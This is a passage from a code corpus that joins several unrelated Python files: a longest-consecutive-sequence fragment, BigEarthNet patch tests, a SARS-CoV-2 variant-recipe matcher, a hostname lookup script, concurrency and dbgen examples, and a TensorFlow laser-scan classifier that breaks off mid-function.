maxLength = 0
maxSeq = None
for lt in anchor:
ptr = lt.next
l = 0
s = []
while ptr is not None:
l += 1
s.append(str(ptr.val))
ptr = ptr.next
if l > maxLength:
maxLength = l
maxSeq = ",".join(s)
return maxLength, maxSeq
def __insertPrevDict(self, prevDict, node):
prevDict[node.val + 1] = node
def __insertNextDict(self, nextDict, node):
nextDict[node.val - 1] = node
def longest_consecutive(nums):
# Fill this in.
solu = Solution()
return solu.longest_consecutive(nums)
if __name__ == "__main__":
print (longest_consecutive([100, 4, 200, 1, 3, 2]))
# 4
print(longest_consecutive([5, 100, 4, 200, 7, 1, 3, 2, 6])) | StarcoderdataPython |
1672918 | import numpy as np
import pytest
from bigearthnet_patch_interface.band_interface import Band
from bigearthnet_patch_interface.merged_interface import *
from bigearthnet_patch_interface.s1_interface import *
from bigearthnet_patch_interface.s2_interface import *
TEST_BANDS = {
"bandVV": random_ben_S1_band(),
"bandVH": random_ben_S1_band(),
"band02": random_ben_S2_band(spatial_resoluion=10),
"band03": random_ben_S2_band(spatial_resoluion=10),
"band04": random_ben_S2_band(spatial_resoluion=10),
"band08": random_ben_S2_band(spatial_resoluion=10),
"band05": random_ben_S2_band(spatial_resoluion=20),
"band06": random_ben_S2_band(spatial_resoluion=20),
"band07": random_ben_S2_band(spatial_resoluion=20),
"band8A": random_ben_S2_band(spatial_resoluion=20),
"band11": random_ben_S2_band(spatial_resoluion=20),
"band12": random_ben_S2_band(spatial_resoluion=20),
"band01": random_ben_S2_band(spatial_resoluion=60),
"band09": random_ben_S2_band(spatial_resoluion=60),
}
def test_short_init_merged_patches():
d = {
"B01": TEST_BANDS["band01"],
"B02": TEST_BANDS["band02"],
"B03": TEST_BANDS["band03"],
"B04": TEST_BANDS["band04"],
"B05": TEST_BANDS["band05"],
"B06": TEST_BANDS["band06"],
"B07": TEST_BANDS["band07"],
"B08": TEST_BANDS["band08"],
"B8A": TEST_BANDS["band8A"],
"B09": TEST_BANDS["band09"],
"B11": TEST_BANDS["band11"],
"B12": TEST_BANDS["band12"],
"VV": TEST_BANDS["bandVV"],
"VH": TEST_BANDS["bandVH"],
}
ben_patch = BigEarthNet_S1_S2_Patch.short_init(**d)
assert (ben_patch.get_band_data_by_name("B02") == TEST_BANDS["band02"]).all()
assert (ben_patch.get_band_data_by_name("B05") == TEST_BANDS["band05"]).all()
assert (ben_patch.get_band_data_by_name("VV") == TEST_BANDS["bandVV"]).all()
assert (ben_patch.get_band_data_by_name("VH") == TEST_BANDS["bandVH"]).all()
@pytest.mark.parametrize("name", ["B01", "B04", "B11", "VV"])
def test_band_by_name(name):
ben_patch = BigEarthNet_S1_S2_Patch(**TEST_BANDS)
isinstance(ben_patch.get_band_by_name(name), Band)
def test_metadata():
metadata = {"labels": ["Marine waters"]}
ben_patch = BigEarthNet_S1_S2_Patch(**TEST_BANDS, **metadata)
assert ben_patch.labels == metadata["labels"]
# FUTURE: Write tests that check the printed output
| StarcoderdataPython |
1611886 | """
Checks a sample if it matches PHE defined recipes for VOC/VUIs. Outputs to stdout
a tab delimited list of the following:
- PHE name for the matching VOC/VUI. "none" if no match. "multiple" if multiple matches.
- pangolin name for the matching VOC/VUI. "none" if no match. "multiple" if multiple matches.
- confidence of the match. "NA" if no match. "multiple" if multiple matches.
- current time on system
Logs debugging information to stderr
"""
from csv import reader
from argparse import ArgumentParser
from yaml import full_load as load_yaml
from datetime import datetime
from sys import exit, stderr
import logging
from recipe_graph import RecipeDirectedGraph
from typing import Tuple
WUHAN_REFERENCE_LENGTH = 29903
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
# create console handler and set level to debug
ch = logging.StreamHandler(stderr)
# create formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# add formatter to ch
ch.setFormatter(formatter)
def get_recipe_match_confidence(recipe: dict, sequence: str, cached_results: dict) -> str:
"""
Calculate the confidence of a sample matching a given PHE VOC/VUI recipe.
PHE VOC/VUI recipes have a list of defining mutations and
different confidence thresholds based on the number of defining mutations that are found
in the sample. A PHE recipe typically defines only a single lineage,
and can depend on other PHE recipes to define required mutations from the ancestral lineages.
Assumes that a recipe can only depend on a single other recipe.
We use child to refer to a recipe that depends on another recipe,
and parent to refer to the other recipe being depended on by the recipe.
Ancestors are the chain of recipes being depended on by a child.
A child returns "confirmed" confidence if it passes "confirmed" threshold of it's own mutation definition,
AND all it's ancestors return "confirmed" or "probable".
A child returns "probable" confidence if it only passes the "probable" threshold of it's own mutation definition,
AND all it's ancestors return "confirmed" or "probable".
A child returns "NA" confidence if it fails all thresholds of it's own mutation definition OR
any of it's ancestors return "NA"
NB: If the recipe depends on another recipe, then calls get_recipe_match_confidence()
recursively. Does not check for cyclic dependencies in the recipes.
If you notice that this method is taking forever, check that there isn't a cycle in the
recipe dependencies causing an infinite recursion loop.
See more details on PHE recipes at https://github.com/phe-genomics/variant_definitions
Parameters:
-------------
recipe : dict
a dict representation of a single PHE recipe.
Expects the recipe dict to contain items:
- unique-id (str): the recipe name
- variants (list): list of SNPs, MNPs, deletions, insertions that define the lineage.
Each mutation will have nested items:
- one-based-reference-position (int): reference position, 1 based
- type: one of [SNP, MNP, deletion, insertion]
- reference-base: ref base if type=SNP, contiguous ref bases if type=MNP, ref base
before insertion if type=insertion, ref base before deletion and deleted ref bases if type=deletion
- variant-base: alt base if type=SNP, contiguous alt bases if type=MNP,
ref base before deletion if type=deletion, ref base before insertion followed by inserted bases if
type=insertion
- special (bool): only if the mutation is absolutely required
- calling-definition (dict): dict of how many mutations are required
for confirmed or probable confidence
- belongs-to-lineage (dict): nested dict containing item {"PANGO" => pangolin lineage}
- phe-label (str): PHE name for the VOC/VUI
- requires (str): the name of the recipe that the current recipe depends on. Can be missing if no dependencies.
sequence: str
Wuhan aligned sequence of sample. Deletions with respect to the reference must be padded with "-",
insertions with respect to the reference must be excised.
cached_results: dict
Hack to keep track of previous results in case we need to recursively call
get_recipe_match_confidence() to get the confidence of nested recipes.
Should have format {recipe_name => confidence}
Returns: str
------------
The confidence of the match for the recipe, taking into account all ancestral recipes if any
"""
recipe_name = recipe["unique-id"]
if recipe_name in cached_results:
logger.debug("Using cached results: " + cached_results[recipe_name])
return cached_results[recipe_name]
alt_match = 0
ref_match = 0
#if a "special mutation", e.g. E484K is required, but not present, this will be flipped to False
special_mutations = True
# Keep track of matched variants for logging
log_alt_match = []
log_ref_match = []
log_wrong_alt = []
pango_alias = "none"
phe_label = "none"
confidence = "NA"
req_recipe_confidence = None
for lineage_mutation in recipe['variants']:
pos = int(lineage_mutation['one-based-reference-position'])-1
if lineage_mutation['type'] == "MNP":
size = len(lineage_mutation['reference-base'])
seq_val = sequence[pos:pos+size]
elif lineage_mutation['type'] == "SNP":
seq_val = sequence[pos]
else:
#not considering indels at present
continue
log_is_special = "_spec" if "special" in lineage_mutation else ""
if seq_val == lineage_mutation['variant-base']:
alt_match += 1
log_alt_match.append("{}{}{}{}".format(
lineage_mutation['reference-base'],
lineage_mutation['one-based-reference-position'],
seq_val,
log_is_special
))
elif seq_val == lineage_mutation['reference-base']:
ref_match += 1
if "special" in lineage_mutation:
special_mutations = False
log_ref_match.append("{}{}{}".format(
lineage_mutation['reference-base'],
lineage_mutation['one-based-reference-position'],
log_is_special))
else:
if "special" in lineage_mutation:
special_mutations = False
log_wrong_alt.append("{}{}{}/{}{}".format(
lineage_mutation['reference-base'],
lineage_mutation['one-based-reference-position'],
lineage_mutation['variant-base'],
seq_val,
log_is_special))
calling_definition = recipe['calling-definition']
confidence = "NA"
pango_alias = recipe['belongs-to-lineage']['PANGO']
phe_label = recipe['phe-label']
if (special_mutations and
alt_match >= calling_definition['confirmed']['mutations-required'] and
ref_match <= calling_definition['confirmed']['allowed-wildtype']):
confidence = "confirmed"
elif ('probable' in calling_definition and
special_mutations and
alt_match >= calling_definition['probable']['mutations-required'] and
ref_match <= calling_definition['probable']['allowed-wildtype']):
confidence = "probable"
overall_confidence = confidence
if "requires" in recipe and confidence in ["confirmed", "probable"]:
req_recipe_name = recipe["requires"]
req_recipe_pango_alias = recipes[req_recipe_name]['belongs-to-lineage']['PANGO']
req_recipe_phe_label = recipes[req_recipe_name]['phe-label']
logger.debug(f"Checking required recipe {req_recipe_name} - {req_recipe_pango_alias} " +
f"of dependent recipe {recipe_name} - {pango_alias} ")
req_recipe_confidence = get_recipe_match_confidence(
recipe=recipes[req_recipe_name],
sequence=sequence,
cached_results=cached_results)
logger.debug(f"Required recipe pango: {req_recipe_pango_alias}" +
f", confidence: {req_recipe_confidence}" +
f", phe-label: {req_recipe_phe_label}" +
f" for reciped recipe {req_recipe_name} - {req_recipe_pango_alias} " +
f" of dependent recipe {recipe_name} - {pango_alias} ")
if req_recipe_confidence not in ["confirmed", "probable"]:
overall_confidence = "NA"
if confidence in ["confirmed", "probable"]:
logger.debug(f"Matched pango: {pango_alias} " +
f", confidence: {confidence} " +
f", overall-confidence: {overall_confidence} " +
f", phe-label: {phe_label}. " )
logger.debug("Alt matches: " + ", ".join(log_alt_match))
logger.debug("Ref matches: " + ", ".join(log_ref_match))
logger.debug("Wrong Alt: " + ", ".join(log_wrong_alt))
return overall_confidence
def find_all_matching_recipes(recipes: dict, sequence: str) -> Tuple[str, str, str]:
"""
Traverse through all PHE VOC/VUI recipes and find all matches.
If a sample matches multiple PHE recipes, and
and the recipes are not along the same branch in the recipe dependency graph,
then the sample is marked as matching "multiple" recipes.
If the sample matches multiple PHE lineage recipes, and
the lineages are related along the same tree branch,
(EG AY.4.2 is a child of B.1.617.2),
then the sample is marked as the lowest lineage along the branch.
Parameters:
--------------------
recipes : dict
{recipe_name => recipe_dict}
Load the dict of recipes from phe_recipes.yaml.
sequence: str
wuhan aligned sequence of sample. Deletions padded with "-". Insertions removed.
Returns: tuple (str, str, str)
---------------------------------
- matched_recipe_phe_label: str
PHE name for the VOC/VUI. "none" if no match. "multiple" if multiple matches.
- matched_recipe_pango_alias: str
pangolin name for the VOC/VUI. "none" if no match. "multiple" if multiple matches.
- matched_confidence: str
confidence of the match. "NA" if no match. "multiple" if multiple matches.
"""
# traverse the recipes and cache any matching recipes and
# associated confidence in dict matched_recipe_name_to_conf
matched_recipe_name_to_conf = {}
for recipe in recipes.values():
confidence = get_recipe_match_confidence(
recipe=recipe,
sequence=sequence,
cached_results=matched_recipe_name_to_conf)
if confidence != "NA":
recipe_name = recipe["unique-id"]
matched_recipe_name_to_conf[recipe_name] = confidence
# If there are multiple matching recipes, but they are all recipes for related lineages
# along the same branch in the lineage tree, then
# we return the lineage recipe for leaf-most lineage.
# If the matching lineages are from different branches in the lineage tree,
# then we mark the sample as "multiple", indicating that there are
# multiple conflicting lineage matches
if len(matched_recipe_name_to_conf.keys()) > 1:
matched_recipes = [recipes[recipe_name] for recipe_name in matched_recipe_name_to_conf.keys()]
matched_recipe_graph = RecipeDirectedGraph(matched_recipes)
if matched_recipe_graph.is_single_branch():
leaf_recipe_name = matched_recipe_graph.get_leaf_name()
leaf_recipe = recipes[leaf_recipe_name]
matched_recipe_pango_alias = leaf_recipe['belongs-to-lineage']['PANGO']
matched_recipe_phe_label = leaf_recipe['phe-label']
matched_confidence = matched_recipe_name_to_conf[leaf_recipe_name]
else:
matched_recipe_pango_alias = "multiple"
matched_recipe_phe_label = "multiple"
matched_confidence = "multiple"
logger.warning("Multiple matches " + str(matched_recipe_graph) )
elif len(matched_recipe_name_to_conf.keys()) == 1:
matched_recipe_name = list(matched_recipe_name_to_conf.keys())[0]
matched_recipe = recipes[matched_recipe_name]
matched_recipe_pango_alias = matched_recipe['belongs-to-lineage']['PANGO']
matched_recipe_phe_label = matched_recipe['phe-label']
matched_confidence = matched_recipe_name_to_conf[matched_recipe_name]
else:
matched_recipe_pango_alias = 'none'
matched_recipe_phe_label = 'none'
matched_confidence = 'NA'
return matched_recipe_phe_label, matched_recipe_pango_alias, matched_confidence
if __name__ == "__main__":
parser = ArgumentParser(description='Genotype an aligned sequence on specified variants of interest')
parser.add_argument('fasta_filename', help="Single sample fasta, wuhan aligned")
parser.add_argument('genotype_recipe_filename', help="Concatenated YAML of PHE VOC/VUI recipes")
parser.add_argument("--verbose", help="increase output verbosity",
action="store_true")
args = parser.parse_args()
if args.verbose:
ch.setLevel(logging.DEBUG)
else:
ch.setLevel(logging.WARN)
# add ch to logger
logger.addHandler(ch)
matched_recipe_pango_alias = "none"
matched_recipe_phe_label = "none"
matched_confidence = "NA"
logger.debug("Processing " + args.fasta_filename)
with open(args.fasta_filename) as fasta_file:
header = fasta_file.readline()
if header[0] != ">":
logger.error("Error with fasta header line. "+header[0])
exit(-1)
sequence = fasta_file.readline().rstrip()
if len(sequence) != WUHAN_REFERENCE_LENGTH:
logger.error("Error, sequence doesn't match Wuhan reference length.")
exit(-1)
with open(args.genotype_recipe_filename) as genotype_recipe_file:
recipes = load_yaml(genotype_recipe_file)
(matched_recipe_phe_label,
matched_recipe_pango_alias,
matched_confidence) = find_all_matching_recipes(recipes=recipes, sequence=sequence)
print(matched_recipe_phe_label, matched_recipe_pango_alias, matched_confidence, datetime.now(), sep="\t")
# print(matched_recipe_phe_label, matched_recipe_pango_alias, matched_confidence, datetime.now(), sep="\t")
| StarcoderdataPython |
154839 | <reponame>tomwisniewskiprv/Python_networking<gh_stars>0
# -*- coding: utf-8 -*-
# Python 3.6
# Python_networking | remote_machine_ip
# 12.07.2017 <NAME>
import socket
import argparse
import sys
def get_remote_machine_ip(remote_host):
try:
print("IP address of {} : {}".format(remote_host, socket.gethostbyname(remote_host)))
except socket.error:
print("{}".format(socket.error))
print("Please check your host name.")
def main(remote_host):
get_remote_machine_ip(remote_host)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Check IP address for remote host.")
parser.add_argument("host", help="Remote or local host name.")
args = parser.parse_args()
main(args.host)
sys.exit()
| StarcoderdataPython |
55988 | <filename>tests/example/map_model.py<gh_stars>1-10
# Copyright 2021 Modelyst LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dbgen import Entity, Extract, Generator, Model
class MapEntity(Entity, table=True):
__identifying__ = {
'label',
}
label: str
class CustomExtractor(Extract):
n: int = 1000
def extract(self):
for i in range(self.n):
yield {'out': i}
def length(self, **_):
return self.n
# Set extract
extract = CustomExtractor(n=100)
# Map lambda over arg
map_pb = extract['out'].map(lambda x: str(x))
# insert
map_load = MapEntity.load(insert=True, validation='strict', label=map_pb['out'])
gen = Generator(name='test_map', transforms=[], loads=[map_load])
model = Model(name='test_map')
model.add_gen(gen)
| StarcoderdataPython |
3305471 | #!/usr/bin/env python3
import concurrent.futures
import time
def func():
print('func')
time.sleep(1)
def main():
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
s_time = time.time()
for i in range(10):
executor.submit(func)
print('Took {} [sec]'.format(time.time() - s_time))
with concurrent.futures.ProcessPoolExecutor(max_workers=2) as executor:
s_time = time.time()
for i in range(10):
executor.submit(func)
print('Took {} [sec]'.format(time.time() - s_time))
if __name__ == '__main__':
main()
| StarcoderdataPython |
1728960 | import os
import csv
import time
import yaml
import shutil
import pickle
import argparse
import numpy as np
import tensorflow as tf
# import tensorflow.compat.v1 as tf
# tf.disable_v2_behavior()
import matplotlib.pyplot as plt
from sklearn.utils import shuffle
SCAN_RANGE = 1.5 * np.pi
SCAN_NUM = 720
def make_args():
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--training_params_filename',
type=str,
default='train_scan_classifier.yaml',
help='Name of filename defining the learning params')
args = parser.parse_args()
config = yaml.load(open(args.training_params_filename))
for k, v in config.items():
args.__dict__[k] = v
args.lr = float(args.lr)
if args.centering_on_gp:
args.cropping = False
args.rslts_dir = os.path.join("..", "rslts", "{}".format(time.strftime("%Y-%m-%d-%H-%M-%S")))
os.makedirs(args.rslts_dir, exist_ok=True)
shutil.copyfile(args.training_params_filename, os.path.join(args.rslts_dir, args.training_params_filename))
args.Dy = len(args.used_context)
return args
def plot_scan(scan, gp, save_path, args):
plt.polar(np.linspace(-SCAN_RANGE / 2, SCAN_RANGE / 2, len(scan)), scan)
gp = np.concatenate([np.zeros((1, 2)), gp], axis=0)
plt.polar(np.arctan2(gp[:, 1], gp[:, 0]), np.linalg.norm(gp, axis=-1))
plt.gca().set_theta_zero_location("N")
plt.gca().set_ylim([0, args.clipping])
plt.savefig(save_path)
plt.close("all")
def preprocess_scan(scan, args):
i = 0
while i < len(scan):
if scan[i] != np.inf:
i += 1
continue
j = i + 1
while j < len(scan) and scan[j] == np.inf:
j += 1
if i == 0:
scan[i:j] = 0.05 * np.ones(j - i)
elif j == len(scan):
scan[i:j] = 0.05 * np.ones(j - i)
else:
scan[i:j] = np.linspace(scan[i - 1], scan[j], j - i + 1)[1:]
i = j
scan = scan.clip(0, args.clipping)
return scan
def preprocess_gp(gp):
gp_clip = []
node_idx = 1
cum_dist = 0
for pt, pt_next in zip(gp.T[:-1], gp.T[1:]):
cum_dist += np.linalg.norm(pt - pt_next)
if node_idx * 0.2 < cum_dist:
gp_clip.append(pt_next)
node_idx += 1
if node_idx == 11:
break
while node_idx < 11:
node_idx += 1
gp_clip.append(gp.T[-1])
gp_clip = np.array(gp_clip)
return gp_clip
def get_dataset(args, draw_data=False):
scan_train, gp_train, y_train = [], [], []
scan_test, gp_test, y_test = [], [], []
for y, fname in enumerate(args.used_context):
fname_ = os.path.join("../bag_files", fname + ".pkl")
if not os.path.exists(fname_):
continue
scans = []
gps = []
ys = []
with open(fname_, "rb") as f:
data = pickle.load(f, encoding='latin1')
for scan, gp in data:
scan = preprocess_scan(scan, args)
gp = preprocess_gp(gp)
scans.append(scan)
gps.append(gp)
ys.append(y)
if draw_data:
fig_dir = os.path.join("..", "data_plots", fname)
os.makedirs(fig_dir, exist_ok=True)
for i, (scan, gp) in enumerate(zip(scans, gps)):
plot_scan(scan, gp, os.path.join(fig_dir, str(i)), args)
# # use first and last 10 % as testing data
num_X = len(scans)
if not args.full_train:
# scan_test.extend(np.concatenate([scans[:num_X // 10], scans[-num_X // 10:]]))
# gp_test.extend(np.concatenate([gps[:num_X // 10], gps[-num_X // 10:]]))
# y_test.extend(ys[:num_X // 10] + ys[-num_X // 10:])
# scan_train.extend(scans[num_X // 10:-num_X // 10])
# gp_train.extend(gps[num_X // 10:-num_X // 10])
# y_train.extend(ys[num_X // 10:-num_X // 10])
scans, gps = shuffle(scans, gps)
scan_test.extend(scans[:num_X // 5])
gp_test.extend(gps[:num_X // 5])
y_test.extend(ys[:num_X // 5])
scan_train.extend(scans[num_X // 5:])
gp_train.extend(gps[num_X // 5:])
y_train.extend(ys[num_X // 5:])
else:
scan_train.extend(scans)
gp_train.extend(gps)
y_train.extend(ys)
# print stats
scans = np.array(scan_train + scan_test)
y = np.array(y_train + y_test)
scan_train = np.array(scan_train)
gp_train = np.array(gp_train)
y_train = np.array(y_train)
scan_test = np.array(scan_test)
gp_test = np.array(gp_test)
y_test = np.array(y_test)
print("Num of train", len(scan_train))
print("Num of test", len(scan_test))
if draw_data:
plt.figure()
plt.hist(scans.reshape((-1), 1), bins="auto")
plt.title("Laser scan distribution")
plt.ylim([0, 10000])
plt.savefig("../data_plots/scan_distribution")
plt.figure()
(unique, counts) = np.unique(y, return_counts=True)
plt.bar(unique, counts)
plt.title("label_distribution")
plt.savefig("../data_plots/label_distribution")
return [scan_train, gp_train], y_train, [scan_test, gp_test], y_test
class ScanClassifier(object):
def __init__(self, args):
self.Dx = args.Dx
self.Dy = args.Dy
self.used_context = args.used_context
self.use_EDL = args.use_EDL
self.dropout_rate = args.dropout_rate
self.scan_Dhs = args.scan_Dhs
self.gp_Dhs = args.gp_Dhs
self.use_conv1d = args.use_conv1d
self.kernel_sizes = args.kernel_sizes
self.filter_sizes = args.filter_sizes
self.strides = args.strides
self.lr = args.lr
self.epochs = args.epochs
self.batch_size = args.batch_size
self.full_train = args.full_train
self.rslts_dir = args.rslts_dir
self.use_weigth = args.use_weigth
self.clipping = args.clipping
self.centering_on_gp = args.centering_on_gp
self.cropping = args.cropping
self.theta_noise_scale = args.theta_noise_scale
self.noise = args.noise
self.noise_scale = args.noise_scale
self.flipping = args.flipping
self.translation = args.translation
self.translation_scale = args.translation_scale
self.mode_inited = False
def _init_model(self):
tf.keras.backend.set_learning_phase(1)
self.scan_ph = tf.placeholder(tf.float32, shape=(None, self.Dx))
self.gp_ph = tf.placeholder(tf.float32, shape=(None, 10, 2))
self.label_ph = tf.placeholder(tf.int32, shape=(None,))
self.annealing_step_ph = tf.placeholder(dtype=tf.int32)
self.dropout_rate_ph = tf.placeholder(dtype=tf.float32)
self.weight_ph = tf.placeholder(tf.float32, shape=(None,))
self.scan_encoder, self.gp_encoder, self.classify_layers = [], [], []
if self.use_conv1d:
for kernel_size, filter_size, stride in zip(self.kernel_sizes, self.filter_sizes, self.strides):
self.scan_encoder.append(tf.keras.layers.Conv1D(filter_size, kernel_size, strides=stride,
activation="relu"))
self.scan_encoder.append(tf.keras.layers.Flatten())
else:
for Dh in self.scan_Dhs:
self.scan_encoder.append(tf.keras.layers.Dense(Dh, activation="relu"))
self.gp_encoder.append(tf.keras.layers.Flatten())
for Dh in self.gp_Dhs:
self.gp_encoder.append(tf.keras.layers.Dense(Dh, activation="relu"))
self.classify_layers.append(tf.keras.layers.Dropout(rate=self.dropout_rate_ph))
self.classify_layers.append(tf.keras.layers.Dense(self.Dy))
scan_h = self.scan_ph
if self.use_conv1d:
scan_h = scan_h[..., tf.newaxis]
for layer in self.scan_encoder:
scan_h = layer(scan_h)
if self.gp_Dhs == [0]:
gp_h = tf.zeros_like(scan_h[:, :0])
else:
gp_h = self.gp_ph
for layer in self.gp_encoder:
gp_h = layer(gp_h)
h = tf.concat([scan_h, gp_h], axis=-1)
for layer in self.classify_layers:
if isinstance(layer, tf.keras.layers.Dropout):
h = layer(h, training=False)
else:
h = layer(h)
global_step_ = tf.Variable(initial_value=0, name='global_step', trainable=False)
if self.use_EDL:
self.evidence = tf.nn.softplus(h)
self.alpha = self.evidence + 1
self.uncertainty = self.Dy / tf.reduce_sum(self.alpha, axis=-1)
self.confidence = 1 - self.uncertainty
self.prob = self.alpha / tf.reduce_sum(self.alpha, axis=-1, keepdims=True)
self.pred = tf.argmax(self.alpha, axis=-1, output_type=tf.int32)
def KL(alpha, K):
beta = tf.constant(np.ones((1, K)), dtype=tf.float32)
S_alpha = tf.reduce_sum(alpha, axis=1, keepdims=True)
KL = tf.reduce_sum((alpha - beta) * (tf.digamma(alpha) - tf.digamma(S_alpha)), axis=1, keepdims=True) +\
tf.lgamma(S_alpha) - tf.reduce_sum(tf.lgamma(alpha), axis=1, keepdims=True) + \
tf.reduce_sum(tf.lgamma(beta), axis=1, keepdims=True) - \
tf.lgamma(tf.reduce_sum(beta, axis=1, keepdims=True))
return KL
def expected_cross_entropy(p, alpha, K, global_step, annealing_step):
if self.use_weigth:
p = p * self.weight_ph[:, tf.newaxis]
loglikelihood = tf.reduce_mean(
tf.reduce_sum(p * (tf.digamma(tf.reduce_sum(alpha, axis=1, keepdims=True)) - tf.digamma(alpha)), 1,
keepdims=True))
KL_reg = tf.minimum(1.0, tf.cast(global_step / annealing_step, tf.float32)) * KL(
(alpha - 1) * (1 - p) + 1, K)
return loglikelihood + KL_reg
label = tf.one_hot(self.label_ph, self.Dy)
loss = expected_cross_entropy(label, self.alpha, self.Dy, global_step_, self.annealing_step_ph)
self.loss = tf.reduce_mean(loss)
else:
logits = h
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=self.label_ph, logits=logits)
if self.use_weigth:
loss = loss * self.weight_ph
self.loss = tf.reduce_mean(loss)
self.pred = tf.argmax(logits, axis=-1, output_type=tf.int32)
pred_correctness = tf.equal(self.pred, self.label_ph)
self.acc = tf.reduce_mean(tf.cast(pred_correctness, tf.float32))
optimizer = tf.train.AdamOptimizer(learning_rate=self.lr)
self.train_op = optimizer.minimize(self.loss, global_step=global_step_)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
self.sess = tf.Session(config=config)
tf.keras.backend.set_session(self.sess)
self.sess.run(tf.global_variables_initializer())
# self.writer = tf.summary.FileWriter(self.rslts_dir)
def _save_model(self, epoch_num):
model_dir = os.path.join(self.rslts_dir, "models")
os.makedirs(model_dir, exist_ok=True)
params = {}
for i, module in enumerate([self.scan_encoder, self.gp_encoder, self.classify_layers]):
for j, layer in enumerate(module):
weights = layer.get_weights()
params["weights_{}_{}".format(i, j)] = weights
with open(os.path.join(model_dir, "model_{}.pickle".format(epoch_num)), "wb") as f:
pickle.dump(params, f, protocol=2)
def _load_model(self, fname):
if not self.mode_inited:
self._init_model()
self.mode_inited = True
with open(fname, "rb") as f:
params = pickle.load(f)
for i, module in enumerate([self.scan_encoder, self.gp_encoder, self.classify_layers]):
if module == self.gp_encoder and self.gp_Dhs == [0]:
continue
for j, layer in enumerate(module):
weights = params["weights_{}_{}".format(i, j)]
layer.set_weights(weights)
def _data_augment(self, scans, gps, training=False):
# scans.shape = (batch_size, D_scan)
# gps.shape = (batch_size, 10, 2)
scan_ori, gp_ori = scans.copy(), gps.copy()
scans = scans.copy()
scans = np.clip(scans, 0, self.clipping)
scans /= self.clipping
data_valid = np.full(len(scans), True)
if training:
batch_size = scans.shape[0]
if self.flipping:
is_flipped = np.random.rand(batch_size) < 0.5
scans[is_flipped] = np.flip(scans[is_flipped], axis=-1)
gps[is_flipped, :, 1] = -gps[is_flipped, :, 1]
if self.centering_on_gp:
theta = np.arctan2(gps[:, :, 1], gps[:, :, 0])
avg_theta = np.mean(theta[:, :5], axis=-1)
start_idxes = (avg_theta / SCAN_RANGE * SCAN_NUM).astype(int) + SCAN_NUM // 2 - self.Dx // 2
data_valid = np.logical_and(start_idxes >= 0, start_idxes + self.Dx < SCAN_NUM)
start_idxes[np.logical_not(data_valid)] = 0
scans = np.array([scans[i, idx:idx + self.Dx] for i, idx in enumerate(start_idxes)])
if self.cropping:
theta_noise = np.random.uniform(-self.theta_noise_scale, self.theta_noise_scale, size=batch_size)
theta_noise = theta_noise / 180 * np.pi
start_idxes = (theta_noise / SCAN_RANGE * SCAN_NUM).astype(int) + (SCAN_NUM - self.Dx) // 2
theta = np.arctan2(gps[:, :, 1], gps[:, :, 0])
r = np.linalg.norm(gps, axis=-1)
theta = theta - theta_noise[:, np.newaxis]
gps = np.stack([r * np.cos(theta), r * np.sin(theta)], axis=-1)
scans = np.array([scans[i, idx:idx + self.Dx] for i, idx in enumerate(start_idxes)])
if self.noise:
scale = self.noise_scale / self.clipping
scan_noise = np.random.uniform(-scale, scale, size=scans.shape)
gp_noise = np.random.uniform(-scale, scale, size=gps.shape)
scans, gps = scans + scan_noise, gps + gp_noise
else:
if self.centering_on_gp:
thetas = np.arctan2(gps[:, :, 1], gps[:, :, 0])[:, :5]
avg_thetas = np.zeros(thetas.shape[0])
for i, theta in enumerate(thetas):
if np.any(theta < -SCAN_RANGE / 2) and np.any(theta > SCAN_RANGE / 2):
theta[theta < 0] += 2 * np.pi
avg_theta = np.mean(theta)
if avg_theta > np.pi:
avg_theta -= 2 * np.pi
else:
avg_theta = np.mean(theta)
avg_thetas[i] = avg_theta
start_idxes = (avg_thetas / SCAN_RANGE * SCAN_NUM).astype(int) + SCAN_NUM // 2 - self.Dx // 2
new_scans = np.zeros((scans.shape[0], self.Dx))
for i, (idx, scan) in enumerate(zip(start_idxes, scans)):
if idx < 0 or idx + self.Dx >= len(scan):
data_valid[i] = False
new_scans[i] = np.zeros(self.Dx)
else:
new_scans[i] = scan[idx:idx + self.Dx]
scans = new_scans
if self.cropping:
i = (SCAN_NUM - self.Dx) // 2
scans = scans[:, i:i + self.Dx]
if not self.centering_on_gp:
thetas = np.arctan2(gps[:, :, 1], gps[:, :, 0])[:, :5]
avg_thetas = np.zeros(thetas.shape[0])
for i, theta in enumerate(thetas):
if np.any(theta < -SCAN_RANGE / 2) and np.any(theta > SCAN_RANGE / 2):
theta[theta < 0] += 2 * np.pi
avg_theta = np.mean(theta)
if avg_theta > np.pi:
avg_theta -= 2 * np.pi
else:
avg_theta = np.mean(theta)
avg_thetas[i] = avg_theta
data_valid = np.abs(avg_thetas) < np.pi / 3
# for x1, x2, x3, x4 in zip(scans, gps, scan_ori, gp_ori):
# plt.polar(np.linspace(-SCAN_RANGE / 2, SCAN_RANGE / 2, len(x3)), x3)
# x4 = np.concatenate([np.zeros((1, 2)), x4], axis=0)
# plt.polar(np.arctan2(x4[:, 1], x4[:, 0]), np.linalg.norm(x4, axis=-1))
#
# x1 *= self.clipping
# plt.polar(np.linspace(-SCAN_RANGE / 2, SCAN_RANGE / 2, len(x1)) * self.Dx / SCAN_NUM, x1)
# x2 = np.concatenate([np.zeros((1, 2)), x2], axis=0)
# plt.polar(np.arctan2(x2[:, 1], x2[:, 0]), np.linalg.norm(x2, axis=-1))
#
# plt.gca().set_theta_zero_location("N")
# plt.gca().set_ylim([0, self.clipping])
# plt.show()
return scans, gps, data_valid
def _translation(self, scans, gps):
def find_intersect(x1, y1, x2, y2, angle):
A1, B1, C1 = y1 - y2, x2 - x1, x2 * y1 - x1 * y2
A2, B2, C2 = np.tan(angle), -1, 0
x = (B2 * C1 - B1 * C2) / (A1 * B2 - A2 * B1)
y = (A1 * C2 - A2 * C1) / (A1 * B2 - A2 * B1)
return x, y
new_scans, new_gps = [], []
for scan, gp in zip(scans, gps):
